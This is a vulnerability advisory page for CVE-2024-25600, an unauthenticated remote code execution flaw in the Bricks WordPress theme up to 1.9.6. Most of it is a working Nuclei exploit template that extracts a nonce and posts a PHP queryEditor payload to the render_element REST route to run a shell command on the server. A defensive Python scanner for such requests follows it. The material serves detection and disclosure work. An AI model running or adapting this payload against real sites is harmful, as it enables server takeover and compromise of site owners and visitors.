CVE-2024-25600: Unauthenticated Remote Code Execution – Bricks <= 1.9.6

Date: 2025-08-01 | Affected software: Bricks | PoC: Public

Vulnerability description

Bricks Builder is a popular WordPress development theme with approximately 25,000 active installations. It provides an intuitive drag-and-drop interface for designing and building WordPress websites. Bricks <= 1.9.6 is vulnerable to unauthenticated remote code execution (RCE), which means that anybody can run arbitrary commands and take over the site/server. This can lead to various malicious activities.

PoC code [public]

id: CVE-2024-25600

info:
  name: Unauthenticated Remote Code Execution – Bricks <= 1.9.6
  author: christbowel
  severity: critical
  description: |
    Bricks Builder is a popular WordPress development theme with approximately 25,000 active installations. It provides an intuitive drag-and-drop interface for designing and building WordPress websites. Bricks <= 1.9.6 is vulnerable to unauthenticated remote code execution (RCE) which means that anybody can run arbitrary commands and take over the site/server. This can lead to various malicious activities
  reference:
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-25600
    - https://wpscan.com/vulnerability/afea4f8c-4d45-4cc0-8eb7-6fa6748158bd/
    - https://snicco.io/vulnerability-disclosure/bricks/unauthenticated-rce-in-bricks-1-9-6
    - https://github.com/Chocapikk/CVE-2024-25600
    - https://op-c.net/blog/cve-2024-25600-wordpresss-bricks-builder-rce-flaw-under-active-exploitation
  classification:
    epss-score: 0.93728
    epss-percentile: 0.99845
  metadata:
    verified: true
    max-request: 2
    publicwww-query: "/wp-content/themes/bricks/"
  tags: cve,cve2024,wpscan,wordpress,wp-plugin,wp,bricks,rce,vkev

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /wp-json/bricks/v1/render_element HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {
          "postId": "1",
          "nonce": "{{nonce}}",
          "element": {
            "name": "container",
            "settings": {
              "hasLoop": "true",
              "query": {
                "useQueryEditor": true,
                "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
                "objectType": "post"
              }
            }
          }
        }
    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "Exception:"
          - "uid=([0-9(a-z-)]+) gid=([0-9(a-z-)]+) groups=([0-9(a-z-)]+)"
        condition: and

    extractors:
      - type: regex
        name: nonce
        part: body
        group: 1
        regex:
          - 'nonce":"([0-9a-z]+)'
        internal: true
# digest: 4a0a0047304502200462e89562364f2e8b429acc6556eca1ca369a15a0a3bcb9d0525304d4555c620221009a54f2c499d42b002293db84e99c1a1dc933df01d98febe99e43d91514dcdc78:922c64590222798bb761d5b6d8e72950
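
A defender-side check for the request shape the template above sends, as an added example that is not part of the original page or of the Bricks project: it scans logged requests for POSTs to the render_element route whose JSON body carries a non-empty queryEditor string. The record format (src, method, path, body) and the sample records are assumptions constructed for illustration.

```python
import json

# Route taken from the template on this page.
RENDER_ROUTE = "/wp-json/bricks/v1/render_element"

def find_query_editor(node):
    """Recursively collect every non-empty 'queryEditor' string in a JSON body."""
    hits = []
    if isinstance(node, dict):
        code = node.get("queryEditor")
        if isinstance(code, str) and code.strip():
            hits.append(code)
        for value in node.values():
            hits.extend(find_query_editor(value))
    elif isinstance(node, list):
        for item in node:
            hits.extend(find_query_editor(item))
    return hits

def inspect_request(record):
    """Classify one logged request as 'ignore', 'review' or 'alert'."""
    path = record["path"].split("?", 1)[0].rstrip("/")
    if record["method"].upper() != "POST" or path != RENDER_ROUTE:
        return "ignore"
    try:
        body = json.loads(record["body"])
    except (ValueError, TypeError):
        return "review"  # route was hit but the body is unreadable: triage by hand
    return "alert" if find_query_editor(body) else "ignore"

def scan(records):
    return [(r["src"], inspect_request(r)) for r in records]

# Constructed sample records (hypothetical log format, documentation IP ranges).
SAMPLE_LOG = [
    {"src": "192.0.2.10", "method": "GET", "path": "/", "body": ""},
    {"src": "198.51.100.7", "method": "POST", "path": RENDER_ROUTE,
     "body": '{"postId": "1", "element": {"name": "heading", "settings": {"text": "Hi"}}}'},
    {"src": "203.0.113.5", "method": "POST", "path": RENDER_ROUTE + "/",
     "body": '{"postId": "1", "element": {"name": "container", "settings": {"hasLoop": "true",'
             ' "query": {"useQueryEditor": true, "queryEditor": "/* constructed placeholder */",'
             ' "objectType": "post"}}}}'},
    {"src": "203.0.113.9", "method": "POST", "path": RENDER_ROUTE, "body": "{not json"},
]

if __name__ == "__main__":
    for src, verdict in scan(SAMPLE_LOG):
        print(f"{src:15} {verdict}")
```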
